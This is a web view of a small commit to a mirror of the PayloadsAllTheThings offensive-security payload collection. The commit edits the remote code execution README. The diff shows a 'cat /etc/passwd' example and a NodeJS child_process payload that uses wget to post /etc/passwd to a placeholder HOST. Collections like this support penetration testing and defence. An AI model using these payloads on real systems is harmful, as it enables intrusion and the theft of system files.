weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

Updated XSS,SQL,RCE

Browse Source
This commit is contained in:
swisskyrepo
2016-11-17 10:50:34 +07:00
parent 9f66d48f2b
commit 2fa9683b8c
3 changed files with 31 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
Remote commands execution/README.md
View File

@@ -3,7 +3,7 @@ Remote code execution is a security vulnerability that allows an attacker to exe
## Exploits
Normal code execution
Normal code execution, execute the command and voila :p
```
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
@@ -37,7 +37,7 @@ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
NodeJS Code execution
```
require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
```
## Thanks to